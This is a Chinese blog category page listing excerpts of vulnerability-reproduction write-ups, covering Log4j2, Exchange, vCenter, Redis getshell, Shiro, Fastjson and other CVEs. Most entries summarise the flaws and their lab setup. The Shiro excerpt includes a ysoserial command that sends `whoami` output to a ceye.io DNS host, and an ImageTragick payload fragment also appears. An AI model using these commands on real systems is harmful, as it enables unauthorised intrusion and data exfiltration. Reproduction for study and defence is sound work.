![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
漏洞复现
文章平均质量分 76
daxi0ng
这个人什么都没有填哦
展开
-
(工具记录)Log4j2_RCE
2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;原创 2023-07-12 20:30:14 · 311 阅读 · 0 评论 -
(环境搭建+复现)CVE-2020-1472 NetLogon 域内提权漏洞
0x00 简介Netlogon组件是Windows上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。Netlogon远程协议是一个可用的在Windows域控制器上的RPC(remote procedure call protocol,远程过程调用协议,允许像调用本地服务一样调用远程服务)接口,用于对域中的用户和其他服务进行身份验证,最常见的是方便用户使用NTLM(N...原创 2022-01-25 15:00:26 · 3888 阅读 · 1 评论 -
(环境搭建+复现)CVE-2021-44228 Apache Log4j 远程代码执行漏洞
0x00 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。0x01 漏洞概述该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。0x02 影响范围Apache Log4j 2.x <= 2.15.0-rc10x02环境搭建1、创建一个新的maven项目,并导入Log4j的依赖包<depe...原创 2021-12-10 18:46:38 · 19797 阅读 · 20 评论 -
(环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现
0x00 简介 Apache HTTP Server(HTTPd)是Apache软件基金会的一个开放源代码的网页服务器。0x01 漏洞概述Apache HTTP Server目录遍历漏洞CVE-2021-41773影响版本:Apache HTTP Server 2.4.49该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,攻击者利用该漏洞在未授权的情况下,访问服务器未在httpd配置文件中标记为拒绝请求的文...原创 2021-10-11 15:19:09 · 1815 阅读 · 1 评论 -
(复现)CVE-2021-34473 Microsoft Exchange远程代码执行
0x00 简介Microsoft Exchange Server 是微软公司的一套电子邮件服务组件。0x01 漏洞概述2021年8月5日,安全研究员在国外安全会议上公开了CVE-2021-34473 Microsoft Exchange Server 远程代码执行漏洞分析及其POC。攻击者利用该漏洞可绕过相关权限验证,进而配合其他漏洞可执行任意代码,控制Microsoft Exchange Server。漏洞利用使用了以下漏洞:CVE-2021-34473...原创 2021-08-17 11:53:53 · 6582 阅读 · 0 评论 -
(复现)CVE-2021-21985 Vmware vcenter远程代码执行RCE
0x00 简介vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。0x01 漏洞概述该漏洞由于vCenter Server默认启用的插件Virtual SAN Heal...原创 2021-06-30 11:08:29 · 4621 阅读 · 1 评论 -
(复现)CVE-2021-21972 Vmware vcenter未授权任意文件上传导致RCE
0x00 简介vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。0x01 漏洞概述vSphere Client(HTML5)在 vCenter Server 插件中存...原创 2021-06-29 15:37:30 · 1575 阅读 · 2 评论 -
(环境搭建+复现)CVE-2021-26855 2021年3月 Exchange Server RCE 复现
0x00 简介Exchange Server是微软公司的是一套电子邮件服务组件,是个消息与协作系统,主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。0x01 漏洞概述CVE-2021-26855该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。危害:该漏洞是Exch原创 2021-03-16 17:31:37 · 6640 阅读 · 4 评论 -
(环境搭建+复现)ZZZCMS模版注入+文件包含getshell
0x00 简介骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。0x01 漏洞概述骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。0x02 影响版本骑士 CMS < 6.0.480x03 环境搭建1、下载最新版74cms。https://www.74cms.com/download原创 2021-02-01 14:59:47 · 2004 阅读 · 1 评论 -
(环境搭建+复现) JumpServer 远程命令执行漏洞
0x00 简介JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统。JumpServer 使用Python / Django 进行开发。0x01 漏洞概述2021年1月15日,JumpServer发布更新,修复了一处远程命令执行漏洞。由于 JumpServer 某些接口未做授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器,执行任意命令。建议相关用户尽快采取措施阻止漏洞攻击。原创 2021-01-20 15:40:45 · 2050 阅读 · 0 评论 -
(环境搭建+复现)zzzcmsV1.7.5前台RCE
0x00 简介zzzcms是一款PHP语言开发的免费建站系统,以简单易上手的标签、安全的系统内核、良好的用户体验为特点,是站长建站的最佳选择。0x01 漏洞概述ZZZCMS一处远程代码执行漏洞。由于某些函数存在过滤不严格,攻击者通过构造恶意请求,可在无需登录的情况下执行任意代码,控制服务器。0x02 影响版本ZZZCMS 1.7.50x03 环境搭建1、下载ZZZCMS 1.7.5链接:https://pan.baidu.com/s/1uJ81idkgE38317F5jaze原创 2021-02-02 11:26:42 · 2593 阅读 · 0 评论 -
(环境搭建+复现)74CMS模版注入+文件包含getshell
0x00 简介骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。0x01 漏洞概述骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。0x02 影响版本骑士 CMS < 6.0.480x03 环境搭建1、下载最新版74cms。https://www.74cms.com/downlo原创 2020-12-22 14:10:29 · 3270 阅读 · 1 评论 -
(环境搭建+复现)CVE-2020-13957 Apache Solr 未授权上传(RCE)漏洞
0x00 简介Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。0x01 漏洞概述Apache Solr 发布公告,旧版本的 ConfigSet API 中存在未授权上传漏洞风险,被利用可能导致 RCE (远程代码执行)。0x02 影响版本Apache Solr 6.6.0 -6.6.5A原创 2020-10-16 18:05:31 · 2344 阅读 · 0 评论 -
(环境搭建+复现) Wordpress文件管理插件任意文件上传漏洞
0x00 简介WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。文件管理器允许您直接从WordPress后端编辑,删除,上载,下载,压缩,复制和粘贴文件和文件夹。不必费心使用FTP来管理文件和从一个位置移动文件。有史以来功能最强大,最灵活,最简单的WordPress文件管理解决方案!0x01 漏洞概述安全人员进行调查时,很快发现WordPress插件.原创 2020-09-25 10:09:15 · 1900 阅读 · 2 评论 -
(环境搭建+复现) Wordpress评论插件wpDiscuz任意文件上传漏洞
0x00 简介wpDiscuz是WordPress评论插件。创新,现代且功能丰富的评论系统,可充实您的网站评论部分。0x01 漏洞概述Wordfence的威胁情报团队在一款名叫wpDiscuz的Wordpress评论插件中发现了一个高危漏洞,而这款插件目前已有超过80000个网站在使用了。这个漏洞将允许未经认证的攻击者在目标站点中上传任意文件,其中也包括PHP文件,该漏洞甚至还允许攻击者在目标站点的服务器中实现远程代码执行。0x02 影响版本wpDiscuz7.0.0– ...原创 2020-09-25 10:24:55 · 824 阅读 · 0 评论 -
(环境搭建+复现) CVE-2020-0618 SQL Server Reporting Services RCE漏洞
1、【CVE编号】CVE-2020-06182、【漏洞名称】SQL Server Reporting Services RCE漏洞3、【靶标分类】通用组件类型靶标4、【影响版本】SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE)SQL Server 2012 for x64-based Systems Service Pa...原创 2020-04-06 16:16:09 · 5493 阅读 · 1 评论 -
(环境搭建+复现) CVE-2020-0674 IE远程代码执行漏洞
1、【CVE编号】CVE-2020-06742、【漏洞名称】IE远程代码执行漏洞3、【靶标分类】Web浏览器类型靶标4、【影响版本】Internet Explorer 10Windows Server 2012Internet Explorer 11Windows 10 Version 1803 for 32-bit SystemsWindows 10 Version 180...原创 2020-04-05 15:34:38 · 2910 阅读 · 0 评论 -
(环境搭建+复现)CVE-2019-17571 Apache Log4j SocketServer 反序列化漏洞
1、【CVE编号】CVE-2019-175712、【漏洞名称】Apache Log4j SocketServer 反序列化漏洞3、【靶标分类】通用漏洞组件类靶标4、【影响版本】Log4j1.2.x<=1.2.175、【漏洞分类】代码执行6、【漏洞等级】高7、【漏洞简介】Apache Log4j 是一个基于 Java 的日志记录工具,是 Apache 软件基金会的一个...原创 2020-04-03 16:52:37 · 8894 阅读 · 1 评论 -
(环境搭建+复现)CVE-2019-3398 Confluence路径穿越漏洞
1、【CVE编号】CVE-2019-33982、【漏洞名称】Confluence路径穿越漏洞3、【靶标分类】Web类型类靶标4、【影响版本】2.0.0 <= version < 6.6.136.7.0 <= version < 6.12.46.13.0 <= version < 6.13.46.14.0 <= version < ...原创 2020-04-02 19:35:33 · 2273 阅读 · 0 评论 -
(环境搭建+复现)CVE-2019-12384 Jackson 远程代码执行漏洞
1、【CVE编号】CVE-2019-123842、【漏洞名称】Jackson 远程命令执行漏洞3、【靶标分类】Web类型类靶标4、【影响版本】Jackson-databind 2.X < 2.9.9.15、【漏洞分类】代码执行6、【漏洞等级】高7、【漏洞简介】由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enab...原创 2020-03-30 21:37:24 · 4116 阅读 · 1 评论 -
(环境搭建+复现) CVE-2019-6341 Drupal XSS漏洞
【CVE编号】CVE-2019-6341【漏洞名称】Drupal XSS漏洞1【靶标分类】Web类型类靶标2【影响版本】在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。3【漏洞分类】XSS4【漏洞等级】中5【漏洞简介】Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内...原创 2020-03-20 23:27:01 · 2393 阅读 · 2 评论 -
(环境搭建+复现) CVE-2019-6339 Drupal 远程代码执行漏洞
【CVE编号】CVE-2019-6341【漏洞名称】Drupal XSS漏洞1【靶标分类】Web类型类靶标2【影响版本】在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。3【漏洞分类】XSS4【漏洞等级】中5【漏洞简介】Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内...原创 2020-03-20 22:20:43 · 3070 阅读 · 0 评论 -
(环境搭建+复现)CVE-2019-12409 Apache Solr远程代码执行漏洞
【CVE编号】CVE-2019-12409【漏洞名称】Apache Solr远程代码执行漏洞1【靶标分类】web中间件漏洞2【漏洞分类】命令执行3【漏洞等级】高4【漏洞简介】Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件...原创 2020-03-16 17:52:15 · 2770 阅读 · 0 评论 -
(环境搭建+复现)CVE-2019-16278 Nostromo Web服务器的远程命令执行
【CNVD编号】CVE-2019-16278【漏洞名称】Nostromo Web服务器的远程命令执行1【靶标分类】web中间件漏洞 2【漏洞分类】命令执行3【漏洞等级】高4【漏洞简介】Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的...原创 2020-03-13 14:10:16 · 1690 阅读 · 0 评论 -
(环境搭建+复现)CVE-2019-9740 Python urllib CRLF 注入
【CNVD编号】 CVE-2019-9740 【漏洞名称】 Python urllib CRLF 命令注入漏洞 1【靶标分类】 通用漏洞组件 2【漏洞分类】命令注入3【漏洞等级】高4【漏洞简介】Python是Python软件基金会的一套开源的、面向对象的程序设计语言。该语言具有可扩展、支持模块和包、支持多种平...原创 2020-03-08 17:44:01 · 1956 阅读 · 0 评论 -
(环境搭建+复现) CVE-2016–3714 Imagetragick 命令执行漏洞
简单复现利用记录一下在vulhub Imagetragick 文件夹下执行docker-compose build && docker-compose up -dps:如果80端口被占用,更改一下映射端口配置docker-compose.yml在这里插入图片描述这样服务就启动在ip:1234**先来Getshell冷静一下**push graphic-conte...原创 2019-12-04 15:57:47 · 531 阅读 · 0 评论 -
Redis未授权访问getshell三种方法 (2、crontab计划任务)
一、在攻击者服务器上监听一个端口1888(注意该端口是开放的):我的centos是6.4版本32位的,nc需要安装32位的https://blog.csdn.net/juexin840/article/details/67635080/1、卸载不可以用的ncyum erase nc2、下载32位ncwget http://vault.centos.org/6.6/os/i386/Pa...原创 2019-11-28 16:51:35 · 2533 阅读 · 0 评论 -
Redis未授权访问getshell三种方法 (3、根据绝对路径上传webshell)
利用条件:1.靶机redis链接未授权2.开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限(我们可以将dir设置为一个目录a,而dbfilename为文件名b,再执行save或bgsave,则我们就可以写入一个路径为a/b的任意文件。)...原创 2019-11-28 15:46:38 · 1601 阅读 · 0 评论 -
Linux下Redis未授权访问getshell三种方法 (1、秘钥登录)
介绍:REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(H...原创 2019-11-26 19:46:46 · 2352 阅读 · 0 评论 -
记录一次shiro反序列化getshell
一个站http://wxbase.xxxxx.com/error/unauth一个包,发现有shiro反序列化漏洞使用ysoserial URLDNS模块探测java -jar ysoserial.jar URLDNS "http://`whoami`.xxxx.ceye.io">payload.datpython2 shiro-encode.py# -*...原创 2019-08-02 15:22:41 · 6976 阅读 · 0 评论 -
(环境搭建+复现)Fastjson1.2.47版本反序列化漏洞复现
0x00 简介fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。0x01 漏洞概述Fastjson1.2.47反序列化漏洞首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型...原创 2019-11-13 15:02:02 · 17446 阅读 · 17 评论